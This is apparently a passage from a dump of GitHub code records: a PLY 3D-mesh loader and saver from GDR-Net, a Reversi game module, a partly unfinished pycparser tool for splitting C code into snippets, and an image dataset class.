assert f.readline().strip() == \"ply\"\n while True:\n line = f.readline().strip()\n if line.startswith(\"element vertex\"):\n N = int(line.split()[-1])\n if line.startswith(\"element face\"):\n F = int(line.split()[-1])\n if line == \"end_header\":\n break\n pts = []\n for _ in range(N):\n pts.append(np.float32(f.readline().split()[:3]))\n ptsExpand = []\n for _ in range(F):\n line = f.readline()\n num, *ptsIdx = line.strip().split()\n for i in range(int(num)):\n for j in range(int(num)):\n if i < j:\n pts_i = pts[int(ptsIdx[i])]\n pts_j = pts[int(ptsIdx[j])]\n pts_bais = 1 / 3.0 * (pts_j - pts_i)\n ptsExpand.append(pts_i + pts_bais)\n ptsExpand.append(pts_i + 2 * pts_bais)\n f.close()\n return np.array(pts + ptsExpand) * vertex_scale\n\n\n# def load_ply_model(model_path):\n# from plyfile import PlyData\n# ply = PlyData.read(model_path)\n# data = ply.elements[0].data\n# x = data['x']\n# y = data['y']\n# z = data['z']\n# return np.stack([x, y, z], axis=-1)\n\n\ndef load_ply_model(model_path, vertex_scale=1.0):\n model = load_ply(model_path)\n return model[\"pts\"] * vertex_scale\n\n\ndef load_ply(path, vertex_scale=1.0):\n # https://github.com/thodan/sixd_toolkit/blob/master/pysixd/inout.py\n # bop_toolkit\n \"\"\"Loads a 3D mesh model from a PLY file.\n\n :param path: Path to a PLY file.\n :return: The loaded model given by a dictionary with items:\n -' pts' (nx3 ndarray),\n - 'normals' (nx3 ndarray), optional\n - 'colors' (nx3 ndarray), optional\n - 'faces' (mx3 ndarray), optional.\n - 'texture_uv' (nx2 ndarray), optional\n - 'texture_uv_face' (mx6 ndarray), optional\n - 'texture_file' (string), optional\n \"\"\"\n if _is_binary(path):\n f = open(path, \"rb\")\n else:\n f = open(path, \"r\")\n\n # Only triangular faces are supported.\n face_n_corners = 3\n\n n_pts = 0\n n_faces = 0\n pt_props = []\n face_props = []\n is_binary = False\n header_vertex_section = False\n header_face_section = False\n texture_file = None\n\n # Read the header.\n while True:\n\n # Strip the newline character(s)\n line = f.readline()\n if isinstance(line, str):\n line = line.rstrip(\"\\n\").rstrip(\"\\r\")\n else:\n line = str(line, \"utf-8\").rstrip(\"\\n\").rstrip(\"\\r\")\n\n if line.startswith(\"comment TextureFile\"):\n texture_file = line.split()[-1]\n elif line.startswith(\"element vertex\"):\n n_pts = int(line.split()[-1])\n header_vertex_section = True\n header_face_section = False\n elif line.startswith(\"element face\"):\n n_faces = int(line.split()[-1])\n header_vertex_section = False\n header_face_section = True\n elif line.startswith(\"element\"): # Some other element.\n header_vertex_section = False\n header_face_section = False\n elif line.startswith(\"property\") and header_vertex_section:\n # (name of the property, data type)\n prop_name = line.split()[-1]\n if prop_name == \"s\":\n prop_name = \"texture_u\"\n if prop_name == \"t\":\n prop_name = \"texture_v\"\n prop_type = line.split()[-2]\n pt_props.append((prop_name, prop_type))\n elif line.startswith(\"property list\") and header_face_section:\n elems = line.split()\n if elems[-1] == \"vertex_indices\" or elems[-1] == \"vertex_index\":\n # (name of the property, data type)\n face_props.append((\"n_corners\", elems[2]))\n for i in range(face_n_corners):\n face_props.append((\"ind_\" + str(i), elems[3]))\n elif elems[-1] == \"texcoord\":\n # (name of the property, data type)\n face_props.append((\"texcoord\", elems[2]))\n for i in range(face_n_corners * 2):\n face_props.append((\"texcoord_ind_\" + str(i), elems[3]))\n else:\n 
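# Unknown list properties (anything besides vertex indices or texcoords) are\n                # reported but tolerated, so slightly unusual PLY exports still load.\n                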
logger.warning(\"Warning: Not supported face property: \" + elems[-1])\n elif line.startswith(\"format\"):\n if \"binary\" in line:\n is_binary = True\n elif line.startswith(\"end_header\"):\n break\n\n # Prepare data structures.\n model = {}\n if texture_file is not None:\n model[\"texture_file\"] = texture_file\n model[\"pts\"] = np.zeros((n_pts, 3), np.float)\n if n_faces > 0:\n model[\"faces\"] = np.zeros((n_faces, face_n_corners), np.float)\n\n # print(pt_props)\n pt_props_names = [p[0] for p in pt_props]\n face_props_names = [p[0] for p in face_props]\n # print(pt_props_names)\n\n is_normal = False\n if {\"nx\", \"ny\", \"nz\"}.issubset(set(pt_props_names)):\n is_normal = True\n model[\"normals\"] = np.zeros((n_pts, 3), np.float)\n\n is_color = False\n if {\"red\", \"green\", \"blue\"}.issubset(set(pt_props_names)):\n is_color = True\n model[\"colors\"] = np.zeros((n_pts, 3), np.float)\n\n is_texture_pt = False\n if {\"texture_u\", \"texture_v\"}.issubset(set(pt_props_names)):\n is_texture_pt = True\n model[\"texture_uv\"] = np.zeros((n_pts, 2), np.float)\n\n is_texture_face = False\n if {\"texcoord\"}.issubset(set(face_props_names)):\n is_texture_face = True\n model[\"texture_uv_face\"] = np.zeros((n_faces, 6), np.float)\n\n # Formats for the binary case.\n formats = {\"float\": (\"f\", 4), \"double\": (\"d\", 8), \"int\": (\"i\", 4), \"uchar\": (\"B\", 1)}\n\n # Load vertices.\n for pt_id in range(n_pts):\n prop_vals = {}\n load_props = [\"x\", \"y\", \"z\", \"nx\", \"ny\", \"nz\", \"red\", \"green\", \"blue\", \"texture_u\", \"texture_v\"]\n if is_binary:\n for prop in pt_props:\n format = formats[prop[1]]\n read_data = f.read(format[1])\n val = struct.unpack(format[0], read_data)[0]\n if prop[0] in load_props:\n prop_vals[prop[0]] = val\n else:\n elems = f.readline().rstrip(\"\\n\").rstrip(\"\\r\").split()\n for prop_id, prop in enumerate(pt_props):\n if prop[0] in load_props:\n prop_vals[prop[0]] = elems[prop_id]\n\n model[\"pts\"][pt_id, 0] = float(prop_vals[\"x\"])\n model[\"pts\"][pt_id, 1] = float(prop_vals[\"y\"])\n model[\"pts\"][pt_id, 2] = float(prop_vals[\"z\"])\n\n if is_normal:\n model[\"normals\"][pt_id, 0] = float(prop_vals[\"nx\"])\n model[\"normals\"][pt_id, 1] = float(prop_vals[\"ny\"])\n model[\"normals\"][pt_id, 2] = float(prop_vals[\"nz\"])\n\n if is_color:\n model[\"colors\"][pt_id, 0] = float(prop_vals[\"red\"])\n model[\"colors\"][pt_id, 1] = float(prop_vals[\"green\"])\n model[\"colors\"][pt_id, 2] = float(prop_vals[\"blue\"])\n\n if is_texture_pt:\n model[\"texture_uv\"][pt_id, 0] = float(prop_vals[\"texture_u\"])\n model[\"texture_uv\"][pt_id, 1] = float(prop_vals[\"texture_v\"])\n\n # Load faces.\n for face_id in range(n_faces):\n prop_vals = {}\n if is_binary:\n for prop in face_props:\n format = formats[prop[1]]\n val = struct.unpack(format[0], f.read(format[1]))[0]\n if prop[0] == \"n_corners\":\n if val != face_n_corners:\n raise ValueError(\"Only triangular faces are supported.\")\n # print(\"Number of face corners: \" + str(val))\n # exit(-1)\n elif prop[0] == \"texcoord\":\n if val != face_n_corners * 2:\n raise ValueError(\"Wrong number of UV face coordinates.\")\n else:\n prop_vals[prop[0]] = val\n else:\n elems = f.readline().rstrip(\"\\n\").rstrip(\"\\r\").split()\n for prop_id, prop in enumerate(face_props):\n if prop[0] == \"n_corners\":\n if int(elems[prop_id]) != face_n_corners:\n raise ValueError(\"Only triangular faces are supported.\")\n elif prop[0] == \"texcoord\":\n if int(elems[prop_id]) != face_n_corners * 2:\n raise 
ValueError(\"Wrong number of UV face coordinates.\")\n else:\n prop_vals[prop[0]] = elems[prop_id]\n\n model[\"faces\"][face_id, 0] = int(prop_vals[\"ind_0\"])\n model[\"faces\"][face_id, 1] = int(prop_vals[\"ind_1\"])\n model[\"faces\"][face_id, 2] = int(prop_vals[\"ind_2\"])\n\n if is_texture_face:\n for i in range(6):\n model[\"texture_uv_face\"][face_id, i] = float(prop_vals[\"texcoord_ind_{}\".format(i)])\n\n f.close()\n model[\"pts\"] *= vertex_scale\n\n return model\n\n\ndef save_ply(path, model, extra_header_comments=None):\n \"\"\"Saves a 3D mesh model to a PLY file.\n\n :param path: Path to a PLY file.\n :param model: 3D model given by a dictionary with items:\n - 'pts' (nx3 ndarray)\n - 'normals' (nx3 ndarray, optional)\n - 'colors' (nx3 ndarray, optional)\n - 'faces' (mx3 ndarray, optional)\n - 'texture_uv' (nx2 ndarray, optional)\n - 'texture_uv_face' (mx6 ndarray, optional)\n - 'texture_file' (string, optional)\n :param extra_header_comments: Extra header comment (optional).\n \"\"\"\n pts = model[\"pts\"]\n pts_colors = model[\"colors\"] if \"colors\" in model.keys() else None\n pts_normals = model[\"normals\"] if \"normals\" in model.keys() else None\n faces = model[\"faces\"] if \"faces\" in model.keys() else None\n texture_uv = model[\"texture_uv\"] if \"texture_uv\" in model.keys() else None\n texture_uv_face = model[\"texture_uv_face\"] if \"texture_uv_face\" in model.keys() else None\n texture_file = model[\"texture_file\"] if \"texture_file\" in model.keys() else None\n\n save_ply2(\n path, pts, pts_colors, pts_normals, faces, texture_uv, texture_uv_face, texture_file, extra_header_comments\n )\n\n\ndef save_ply2(\n path,\n pts,\n pts_colors=None,\n pts_normals=None,\n faces=None,\n texture_uv=None,\n texture_uv_face=None,\n texture_file=None,\n extra_header_comments=None,\n):\n \"\"\"Saves a 3D mesh model to a PLY file.\n\n :param path: Path to the resulting PLY file.\n :param pts: nx3 ndarray with vertices.\n :param pts_colors: nx3 ndarray with vertex colors (optional).\n :param pts_normals: nx3 ndarray with vertex normals (optional).\n :param faces: mx3 ndarray with mesh faces (optional).\n :param texture_uv: nx2 ndarray with per-vertex UV texture coordinates\n (optional).\n :param texture_uv_face: mx6 ndarray with per-face UV texture coordinates\n (optional).\n :param texture_file: Path to a texture image -- relative to the resulting\n PLY file (optional).\n :param extra_header_comments: Extra header comment (optional).\n \"\"\"\n if pts_colors is not None:\n pts_colors = np.array(pts_colors)\n assert len(pts) == len(pts_colors)\n\n valid_pts_count = 0\n for pt_id, pt in enumerate(pts):\n if not np.isnan(np.sum(pt)):\n valid_pts_count += 1\n\n f = open(path, \"w\")\n f.write(\n \"ply\\n\"\n \"format ascii 1.0\\n\"\n # 'format binary_little_endian 1.0\\n'\n )\n\n if texture_file is not None:\n f.write(\"comment TextureFile {}\\n\".format(texture_file))\n\n if extra_header_comments is not None:\n for comment in extra_header_comments:\n f.write(\"comment {}\\n\".format(comment))\n\n f.write(\n \"element vertex \" + str(valid_pts_count) + \"\\n\" \"property float x\\n\" \"property float y\\n\" \"property float z\\n\"\n )\n if pts_normals is not None:\n f.write(\"property float nx\\n\" \"property float ny\\n\" \"property float nz\\n\")\n if pts_colors is not None:\n f.write(\"property uchar red\\n\" \"property uchar green\\n\" \"property uchar blue\\n\")\n if texture_uv is not None:\n f.write(\"property float texture_u\\n\" \"property float texture_v\\n\")\n if faces 
is not None:\n        f.write(\"element face \" + str(len(faces)) + \"\\n\" \"property list uchar int vertex_indices\\n\")\n        if texture_uv_face is not None:\n            f.write(\"property list uchar float texcoord\\n\")\n    f.write(\"end_header\\n\")\n\n    format_float = \"{:.4f}\"\n    format_2float = \" \".join((format_float for _ in range(2)))\n    format_3float = \" \".join((format_float for _ in range(3)))\n    format_int = \"{:d}\"\n    format_3int = \" \".join((format_int for _ in range(3)))\n\n    # Save vertices.\n    for pt_id, pt in enumerate(pts):\n        if not np.isnan(np.sum(pt)):\n            f.write(format_3float.format(*pts[pt_id].astype(float)))\n            if pts_normals is not None:\n                f.write(\" \")\n                f.write(format_3float.format(*pts_normals[pt_id].astype(float)))\n            if pts_colors is not None:\n                f.write(\" \")\n                f.write(format_3int.format(*pts_colors[pt_id].astype(int)))\n            if texture_uv is not None:\n                f.write(\" \")\n                f.write(format_2float.format(*texture_uv[pt_id].astype(float)))\n            f.write(\"\\n\")\n\n    # Save faces.\n    if faces is not None:\n        for face_id, face in enumerate(faces):\n            line = \" \".join(map(str, map(int, [len(face)] + list(face.squeeze()))))\n            if texture_uv_face is not None:\n                uv = texture_uv_face[face_id]\n                line += \" \" + \" \".join(map(str, [len(uv)] + list(map(float, uv.squeeze()))))\n            f.write(line)\n            f.write(\"\\n\")\n\n    f.close()\n\n\ndef save_ply_float_color(path, pts, pts_colors=np.array([]), pts_normals=np.array([]), faces=np.array([])):\n    # https://github.com/thodan/sixd_toolkit/blob/master/pysixd/inout.py\n    \"\"\"Saves a 3D mesh model to a PLY file.\n\n    :param path: Path to the resulting PLY file.\n    :param pts: nx3 ndarray\n    :param pts_colors: nx3 ndarray\n    :param pts_normals: nx3 ndarray\n    :param faces: mx3 ndarray\n    \"\"\"\n    pts_colors = np.array(pts_colors)\n    if pts_colors.size != 0:\n        assert len(pts) == len(pts_colors)\n\n    valid_pts_count = 0\n    for pt_id, pt in enumerate(pts):\n        if not np.isnan(np.sum(pt)):\n            valid_pts_count += 1\n\n    f = open(path, \"w\")\n    f.write(\n        \"ply\\n\"\n        \"format ascii 1.0\\n\"\n        # 'format binary_little_endian 1.0\\n'\n        \"element vertex \" + str(valid_pts_count) + \"\\n\"\n        \"property float x\\n\"\n        \"property float y\\n\"\n        \"property float z\\n\"\n    )\n    if pts_normals.size != 0:\n        f.write(\"property float nx\\n\" \"property float ny\\n\" \"property float nz\\n\")\n    if pts_colors.size != 0:\n        f.write(\"property float red\\n\" \"property float green\\n\" \"property float blue\\n\")\n    if faces.size != 0:\n        f.write(\"element face \" + str(len(faces)) + \"\\n\" \"property list uchar int vertex_indices\\n\")\n    f.write(\"end_header\\n\")\n\n    format_float = \"{:.4f}\"\n    format_3float = \" \".join((format_float for _ in range(3)))\n    format_int = \"{:d}\"\n    # format_3int = \" \".join((format_int for _ in range(3)))\n    for pt_id, pt in enumerate(pts):\n        if not np.isnan(np.sum(pt)):\n            f.write(format_3float.format(*pts[pt_id].astype(float)))\n            if pts_normals.size != 0:\n                f.write(\" \")\n                f.write(format_3float.format(*pts_normals[pt_id].astype(float)))\n            if pts_colors.size != 0:\n                f.write(\" \")\n                f.write(format_3float.format(*pts_colors[pt_id].astype(float)))\n            f.write(\"\\n\")\n    for face in faces:\n        f.write(\" \".join(map(str, map(int, [len(face)] + list(face.squeeze())))) + \" \")\n        f.write(\"\\n\")\n    f.close()\n\n\ndef obj_vtx(filename):\n    \"\"\"borrow from glumpy:\n\n    https://github.com/glumpy/glumpy/blob/master/glumpy/data/__init__.py.\n    \"\"\"\n    V = [] # vertex\n    for lineno, line in enumerate(open(filename)):\n        if line[0] == \"#\":\n            continue\n        values = line.strip().split(\" \")\n
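        # Only 'v' (vertex) records are consumed; comments are skipped by the check\n        # above and every other OBJ element by the 'v' check below.\n        code 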
= values[0]\n values = values[1:]\n # vertex (v)\n if code == \"v\":\n V.append([float(x) for x in values])\n # Building the vertices\n V = np.array(V, dtype=np.float32)\n return V\n\n\nif __name__ == \"__main__\":\n # test load (binary/text) ply model\n train_model_dir = \"data/BOP_DATASETS/lm_full/models\"\n val_model_dir = \"data/BOP_DATASETS/lm_full/models_eval\"\n obj_id = 1\n model_train = load_ply(osp.join(train_model_dir, \"obj_{:06d}.ply\".format(obj_id)))\n print(\"train\", model_train[\"pts\"].shape, model_train[\"pts\"].min(0), model_train[\"pts\"].max(0))\n model_val = load_ply(osp.join(val_model_dir, \"obj_{:06d}.ply\".format(obj_id)))\n print(\"val\", model_val[\"pts\"].shape, model_val[\"pts\"].min(0), model_val[\"pts\"].max(0))\n \"\"\"\n # test PlyData and load_ply\n model_dir = \"data/LINEMOD_6D/models\"\n cls_name = \"ape\"\n model_path = osp.join(model_dir, \"{0}/{0}_sphere.ply\".format(cls_name))\n model = load_ply(model_path)\n print(model.keys())\n model_indices = model[\"faces\"].astype(np.int32)\n # print(model_indices)\n\n from plyfile import PlyData\n\n data = PlyData.read(model_path)\n print(data[\"vertex\"])\n vertex_indices = data[\"face\"][\"vertex_indices\"]\n # print(vertex_indices)\n indices = np.asarray(list(vertex_indices), np.uint32)\n # print(indices)\n\n print(np.array_equal(model_indices, indices))\n \"\"\"\n","repo_name":"THU-DA-6D-Pose-Group/GDR-Net","sub_path":"lib/pysixd/inout.py","file_name":"inout.py","file_ext":"py","file_size_in_byte":32484,"program_lang":"python","lang":"en","doc_type":"code","stars":213,"dataset":"github-code","pt":"37"} +{"seq_id":"7563307042","text":"# -*- coding: utf-8 -*-\n\"\"\"\nhuman player\npython 3.6 +\n\n@author : djh-sudo\nIf you have any question, pls contact me\nat djh113@126.com\n\"\"\"\n\nimport os\nfrom board import *\nimport mcts\nfrom policyValueNet import ValueNet\n\n\nclass Human(object):\n def __init__(self):\n self.player = None\n\n def set_index(self, p: int):\n self.player = p\n\n def action(self, board: Board):\n try:\n print('X is black, O is white | Now is player', self.player)\n location = input(\"input(x, y) you want to go\\n\")\n if isinstance(location, str): # for python3\n x, y = int(location.split(',')[0]), int(location.split(',')[-1])\n point = board.location_to_point([x, y])\n else:\n point = -1\n except Exception as e:\n print(e)\n point = -1\n if point == -1 or point not in board.available:\n print('Invalid position')\n point = self.action(board)\n return point\n\n def __str__(self):\n return \"Human{}\".format(self.player)\n\n\ndef two_human_run():\n width, height = 8, 8\n board = Board(width, height)\n game = Game(board)\n\n h1 = Human()\n h2 = Human()\n\n game.start_play(h1, h2)\n\n\ndef play_with_AI(model_path: str):\n # assert os.path.exists(model_path), 'Invalid model path!'\n width, height = 8, 8\n board = Board(width, height)\n game = Game(board)\n policy_val_net = ValueNet(width, height, model_path)\n # AI\n mcts_player_AI = mcts.AI_MCTS_Player(policy_val_fun=policy_val_net.policy_value_fn, c=4)\n # Human\n human = Human()\n # start play\n game.start_play(mcts_player_AI, human, shown=True, start_player=1)\n\n\nclass PlayOnline(object):\n def __init__(self):\n self.width = 8\n self.height = 8\n # return obj\n self.is_end = False\n self.who_win = -1\n self.has_error = False\n # parameter\n self.policy_val_net = None\n self.board = None\n self.game = None\n self.mcts_player_AI = None\n\n def init(self, model_path):\n self.policy_val_net = ValueNet(self.width, self.height, 
model_path)\n self.board = Board(self.width, self.height)\n self.game = Game(self.board)\n self.mcts_player_AI = mcts.AI_MCTS_Player(\n policy_val_fun=self.policy_val_net.policy_value_fn, c=4)\n self.board.init_board(0)\n\n def reset(self):\n self.board.init_board(0)\n\n def two_human_play_online(self, point: int, role: int):\n self.has_error = False\n # Human 1 black piece\n if role in [-1, 1]:\n self.board.draw(point)\n else:\n self.has_error = True\n return {\"error\": self.has_error,\n \"board\": None,\n \"available\": None,\n \"is_end\": None,\n \"who_win\": None,\n \"turn\": None}\n self.is_end, self.who_win = self.board.game_end()\n return {\"error\": self.has_error,\n \"board\": self.board.status.flatten().tolist(),\n \"available\": self.board.available,\n \"is_end\": self.is_end,\n \"who_win\": self.who_win,\n \"turn\": self.board.current_player}\n\n def AI_play_online(self, point: int, role: int):\n self.has_error = False\n # Human black piece\n if role == 1:\n self.board.draw(point)\n # AI write piece\n elif role == -1:\n point = self.mcts_player_AI.action(self.board)\n self.board.draw(point)\n else:\n self.has_error = True\n return {\"error\": self.has_error,\n \"board\": None,\n \"available\": None,\n \"is_end\": None,\n \"who_win\": None,\n \"turn\": None,\n \"point\": None}\n self.is_end, self.who_win = self.board.game_end()\n return {\"error\": self.has_error,\n \"board\": self.board.status.flatten().tolist(),\n \"available\": self.board.available,\n \"is_end\": self.is_end,\n \"who_win\": self.who_win,\n \"turn\": self.board.current_player,\n \"point\": str(point)}\n\n\nif __name__ == '__main__':\n # two_human_run()\n play_with_AI('./model/best_94_policy_model')\n\n\n","repo_name":"djh-sudo/AI-Reversi","sub_path":"src/Human.py","file_name":"Human.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32035926359","text":"import argparse\nimport shutil\nimport os\n\nfrom pycparser import c_parser, preprocess_file, c_ast, c_generator\n\nfrom typemap import Typemap, DefinitionMap\nfrom visitors import ScopedNodeVisitor\n\n_DEBUG_CODE_SPLITTER = False\n_DEBUG_BUILD_TYPEMAP = True\n\nclass Unimplemented(Exception):\n pass\n\nclass DefaultClassifier(object):\n def __init__(self):\n pass\n\n # return a score between 0.0. 
and 1.0 for likelihood of usefulness.\n    def score(self, code):\n        return 1.0\n\n\nclass FunctionSplitter(c_ast.NodeVisitor):\n    def __init__(self):\n        super().__init__()\n\n        self.funs = []\n\n    def visit_FuncDef(self, node):\n        self.funs.append(node)\n\nclass CodeSplitter(c_ast.NodeVisitor):\n    def __init__(self):\n        super().__init__()\n\n        self.snips = []\n\n    # Return whether this is a snippable type.\n    # Most types are not snippable --- compound is\n    # dealt with as a special case.\n    def is_snippable_type(self, node):\n        name = node.__class__.__name__\n\n        return name in ['For', 'While', 'Case', 'DoWhile', 'Enumerator', 'If']\n\n    def visit(self, node):\n        # Check if this is a sane node to split out:\n        generator = c_generator.CGenerator()\n        if _DEBUG_CODE_SPLITTER:\n            print(\"Visiting node type \", node.__class__.__name__)\n            print(\"Visiting \", generator.visit(node))\n\n        if self.is_snippable_type(node):\n            self.snips.append(node)\n\n        super().visit(node)\n\n    # Special case for visiting a sequence: we add\n    # every ordered subsequence, not every sequence\n    # in total.\n    def visit_Compound(self, node):\n        child_seqs = []\n\n        for (name, node) in node.children():\n            child_seqs.append(node)\n\n        # Add every subset of this.\n        for i in range(0, len(child_seqs)):\n            for j in range(0, len(child_seqs)):\n                if i < j:\n                    new_compound = c_ast.Compound(child_seqs[i:j])\n                    self.snips.append(new_compound)\n\n        # Recurse as normal.\n        super().generic_visit(node)\n\n# Build a typemap. The typemap goes from nesting number -> name -> ID.\n# \nclass BuildTypemap(ScopedNodeVisitor):\n    def __init__(self):\n        super().__init__()\n\n        self.typemaps = Typemap()\n        self.current_id = -1\n        self.definition_maps = DefinitionMap()\n        self.ids_stack = []\n\n    def is_scoped_type(self, name):\n        return name in ['FuncDecl', 'Compound', 'For', 'While', 'DoWhile', 'Switch']\n\n    def visit(self, node, id):\n        node_name = node.__class__.__name__\n\n        if self.is_scoped_type(node_name):\n            if _DEBUG_BUILD_TYPEMAP:\n                print (\"Entering new scope: \", node_name)\n            # Create a new level of nesting in the typemap.\n            self.typemaps.add_nest(id, self.current_id)\n            self.definition_maps.add_nest(id, self.current_id)\n\n            self.ids_stack.append(self.current_id)\n\n            self.current_id = id\n        elif _DEBUG_BUILD_TYPEMAP:\n            print(\"Not entering new scope: \", node_name)\n\n        super().visit(node, id)\n\n    def visit_Decl(self, node, id):\n        if _DEBUG_BUILD_TYPEMAP:\n            print (\"Visiting decl :\", node.name)\n        self.typemaps.add_type(node.name, node.type, self.current_id)\n
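\n        # A declaration's own type subtree can contain further scoped declarations (a\n        # function declarator with its parameter list, for instance), so the generic\n        # traversal alone would miss them.\n        # Need to manually recurse -- some defs are\n        # e.g. 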
functions\n for typ, child in node.children():\n self.visit(child, self.id_for(child))\n\n def unvisit(self, node, id):\n node_name = node.__class__.__name__\n\n if self.is_scoped_type(node_name):\n if _DEBUG_BUILD_TYPEMAP:\n print(\"Exiting scope for \", node_name)\n\n self.typemaps.unnest()\n self.definition_maps.unnest()\n\n self.current_id = self.ids_stack.pop()\n\n super().unvisit(node, id)\n\n# Given a snip, get the undefined components of\n# that function: split into parameters that should\n# be passed and types that need to be defined.\nclass GetParams(ScopedNodeVisitor):\n def __init__(self):\n super().__init__()\n\n self.params = []\n # Dict from scoping to the set of vairables\n # defined at that nesting.\n self.defined_variables = {}\n self.current_nesting = -1 # IDs start from 0.\n self.nesting_stack = []\n\n def is_scoped_type(self, name):\n return name in ['Compound', 'For', 'While', 'DoWhile', 'Switch']\n\n def visit(self, node, id):\n node_name = node.__class__.__name__\n\n # if entering scope, set it up properly.\n if self.is_scoped_type(node_name):\n self.nesting_stack.append(self.current_nesting)\n self.current_nesting = id\n self.defined_variables[self.current_nesting] = set()\n\n super().visit(node, id)\n\n def unvisit(self, node, id):\n node_name = node.__class__.__name__\n\n # if exiting scope, then wind up the stack.\n if self.is_scoped_type(node_name):\n self.current_nesting = self.nesting_stack.pop()\n del self.defined_variables[self.current_nesting]\n\n super().unvisit(node, id)\n\n # check that this is defined\n def visit_ID(self, node, id):\n if self.is_defined(node.name):\n pass\n else:\n self.params.append(node.name)\n\n # Add a new declaration o\n def visit_Decl(self, node, id):\n self.defined_variables[self.current_nesting].add(node.name)\n\n # Go through the def stack to figure out if this is currently defined\n def is_defined(self, name):\n current_nest = self.current_nesting\n nest = self.nesting_stack[:]\n\n # go through the hierachy of type windows.\n while len(nest) > 0:\n if name in self.defined_variables[current_nest]:\n return True\n else:\n current_nest = nest.pop()\n\n # one last check as self.current_nesting is not included\n # on the stack.\n return name in self.defined_variables[current_nest]\n\n\n# Generate a function header for a snippet.\n# take a typemap that has both the types\n# for each variable name and the definitoin lookup\n# map so a whole chunk of code can be created.\ndef generate_functions(snippet, snippet_nesting, typemap_walk):\n if snippet.__class__.__name__ == 'FuncDef':\n # Already a function :)\n return snippet\n\n # Build a function header and body.\n param_getter = GetParams()\n param_getter.start_visit(snippet)\n\n params_list = []\n # Get the variables and types that we have to create:\n for param in param_getter.params:\n params_list.append(\n param.\n TODO\n )\n\n func_type = IdentifierType(['void'])\n func_args = ParamList([ ])\n decl = FuncDecl(func_args, func_type)\n func = FuncDef(decl, param_decls, snippet)\n\n\ndef get_typemap(code):\n v = BuildTypemap()\n\n for item_def in code.ext:\n # Note that there is a wee bug by splitting\n # there here, which is that a function may appear\n # to be undefined in its own body.\n v.start_visit(item_def.decl)\n v.start_visit(item_def.body)\n\n return v\n\n\ndef load_code(code_path):\n preprocessed = preprocess_file(code_path)\n parser = c_parser.CParser()\n ast = parser.parse(preprocessed)\n\n return ast\n\ndef load_classifier(mode):\n # TODO --- properly load based on name 
provided\n    if mode == 'DefaultClassifier':\n        return DefaultClassifier()\n    raise Unimplemented()\n\ndef generate_options(args, code):\n    # first load the classifier;\n    classifier = load_classifier(args.classification_mode)\n\n    if args.sub_function:\n        # TODO --- generate all the sane snips.\n        v = CodeSplitter()\n        v.visit(code)\n        snips = v.snips\n    else:\n        v = FunctionSplitter()\n        v.visit(code)\n        snips = v.funs\n\n    snip_score_pairs = []\n    for snip in snips:\n        # Get the score for each snip:\n        score = classifier.score(snip)\n        snip_score_pairs.append((snip, score))\n\n    # Sort:\n    sorted_snips = sorted(snip_score_pairs, key=lambda x: x[1], reverse=True)\n\n    # Return top-N:\n    returned = [snip[0] for snip in sorted_snips[:args.number_to_generate]]\n    return returned\n\ndef output_options(args, options):\n    if os.path.exists(args.output_folder):\n        shutil.rmtree(args.output_folder)\n\n    os.mkdir(args.output_folder)\n\n    generator = c_generator.CGenerator()\n\n    choice = 0\n    for opt in options:\n        with open(args.output_folder + '/' + str(choice) + '.c', 'w') as f:\n            f.write(generator.visit(opt))\n        choice += 1\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\"Snip functions out of C files\")\n\n    parser.add_argument(\"c_file\")\n    parser.add_argument(\"--classification-mode\", default=\"DefaultClassifier\", dest='classification_mode')\n\n    parser.add_argument('--sub-function', default=False, action='store_true', dest='sub_function')\n    parser.add_argument('--number-to-generate', default=10, type=int, dest='number_to_generate')\n    parser.add_argument('--output-folder', default='output', dest='output_folder')\n\n    args = parser.parse_args()\n\n    ast = load_code(args.c_file)\n    typemap = get_typemap(ast)\n\n    options = generate_options(args, ast)\n    functions = generate_functions(args, options, typemap)\n\n    output_options(args, options)\n","repo_name":"j-c-w/classifier","sub_path":"classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":9610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23836394850","text":"import glob\nimport random\nimport os\nimport cv2\n\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport numpy as np\nimport torchvision.transforms as transforms\n\nclass ImageDataset(Dataset):\n    def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n        self.transform = transforms.Compose(transforms_)\n        self.unaligned = unaligned\n\n        self.files_A = sorted(glob.glob(os.path.join(root, '%s/D' % mode) + '/*.*'))\n        self.files_B = sorted(glob.glob(os.path.join(root, '%s/B' % mode) + '/*.*'))\n\n    def __getitem__(self, index):\n        item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))\n\n        if self.unaligned:\n            item_B = self.transform(Image.open(self.files_B[random.randint(0, len(self.files_B) - 1)]))\n        else:\n            item_B = self.transform(Image.open(self.files_B[index % len(self.files_B)]))\n\n        return {'A': item_A, 'B': item_B}\n\n    def __len__(self):\n        return max(len(self.files_A), len(self.files_B))\n\n\nclass CharDataset(Dataset):\n    def __init__(self, root, transforms_=None, unaligned=False, mode='train'):\n        self.transform = transforms.Compose(transforms_)\n        self.unaligned = unaligned\n\n        self.files_A = sorted(glob.glob(os.path.join(root, '%s/A' % mode) + '/*.*'))\n\n    def __getitem__(self, index):\n\n        item_A = self.transform(Image.open(self.files_A[index % len(self.files_A)]))\n        return {'A': item_A, 'label': torch.tensor(index)}\n
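\n    # The dataset size is simply the number of files discovered for split A.\n    def __len__(self):\n        return 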
len(self.files_A)\n\n\nif __name__ == '__main__':\n\n dir_root = 'datasets/seq/train'\n img_dirs_part = os.path.join(dir_root,'imgs_ske')\n print(img_dirs_part)\n for folder_name in glob.glob(img_dirs_part+'/*'):\n for img_name in sorted(glob.glob(folder_name + '/*.jpg'))[1:]:\n img = cv2.imread(img_name)\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n succ = cv2.imwrite(img_name, img[:,:,0])\n\n","repo_name":"hzm2016/Robot-Teaching-Assiantant","sub_path":"gan/datasets/base_datasets.py","file_name":"base_datasets.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35764989970","text":"\"\"\"A simple multi-agent env with two agents playing rock paper scissors.\n\nThis demonstrates running the following policies in competition:\n (1) heuristic policy of repeating the same move\n (2) heuristic policy of beating the last opponent move\n (3) LSTM/feedforward PG policies\n (4) LSTM policy with custom entropy loss\n\"\"\"\n\nimport 